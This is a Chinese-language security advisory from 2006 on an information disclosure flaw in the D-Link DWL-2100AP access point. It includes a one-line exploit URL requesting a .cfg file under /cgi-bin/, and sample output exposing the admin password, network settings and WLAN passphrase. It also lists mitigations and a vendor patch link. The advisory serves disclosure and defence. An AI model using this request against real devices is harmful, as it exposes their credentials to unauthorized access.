首页 -> 安全研究

安全研究

安全漏洞
D-Link DWL-2100AP信息泄漏漏洞

发布日期:2006-06-06
更新日期:2006-06-06

受影响系统:
D-Link DWL-2100ap
描述:
BUGTRAQ  ID: 18299

D-Link DWL-2100ap是一款流行的无线接入点。

如果攻击者对/cgi-bin/目录中任何有.cfg扩展名的文件发起HTTP请求的话,就会返回所有的设备配置,包括 用户名、口令、SSID、IP、子网掩码等。

<*来源:Wendel Guglielmetti Henrique
        Intruders Tiger Team Security (http://www.intruders.com.br/)
  
  链接:http://www.intruders.com.br/adv0206en.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

发起以下请求:

http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg

可返回类似于以下的结果:

# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.

建议:
临时解决方法:

1 - 使用强壮的cookies确保只有授权用户才能访问配置;
2 - 使用哈希储存敏感信息;
3 - 创建防火墙策略过滤端口和IP;
4 - 要求初次登录后更改默认的用户名/口令,不允许将口令更改为最近一次使用的;
5 - 使用HTTPS。

厂商补丁:

D-Link
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.dlinkbrasil.com.br/internet/downloads/Wireless/DWL-2100AP/DWL2100AP-firmware-v210na-r0343.tfp

浏览次数:3088
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障